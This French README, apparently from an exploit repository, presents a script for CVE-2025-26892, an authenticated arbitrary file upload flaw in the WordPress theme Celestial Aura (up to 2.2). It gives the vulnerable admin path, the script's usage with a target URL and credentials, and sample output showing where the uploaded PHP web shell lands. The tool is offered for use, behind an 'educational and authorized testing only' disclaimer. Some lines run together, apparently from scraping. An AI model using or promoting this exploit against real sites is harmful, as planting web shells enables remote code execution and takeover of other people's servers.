
Le thème WordPress Celestial Aura <= 2.2 est vulnérable au téléchargement arbitraire de fichiers.
Une vulnérabilité de téléchargement de fichier sans restriction existe dans le thème WordPress Celestial Aura (développé par dkszone) jusqu'à la version 2.2.
Un utilisateur authentifié à faibles privilèges peut télécharger des fichiers PHP arbitraires via le panneau d'administration du thème, ce qui peut conduire à une exécution de code à distance (RCE).
Celestial Aurawp-admin/admin.php?page=CA-settingsÉvaluation Patchstack CNA :
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:Husage: CVE-2025-26892.py [-h] --url URL --username USERNAME --password PASSWORD
CVE-2025-26892 | WordPress Celestial Aura Theme <= 2.2 Arbitrary File Upload (Authenticated)
options:
-h, --help Show this help message and exit
--url, -u URL Target WordPress site (e.g., http://127.0.0.1/wordpress)
--username, -un WordPress username (any authenticated user)
--password, -p WordPress password
Le script se connecte avec les identifiants fournis, télécharge un shell PHP malveillant (nxploit.php) via les paramètres vulnérables du thème, et affiche l'URL directe du shell téléchargé.
[+] Exploit sent successfully.
[+] Form Fields Sent:
- CA_hdrimage: yes
...
- CA_save: Save changes
[+] Shell Location:
http://target-site/wp-content/uploads/nxploit.php
Exploit By: Khaled_alenazi (Nxploited)
Ce projet est uniquement destiné à des fins éducatives et de tests de pénétration autorisés.
Toute utilisation abusive de cet outil n'engage pas la responsabilité de l'auteur.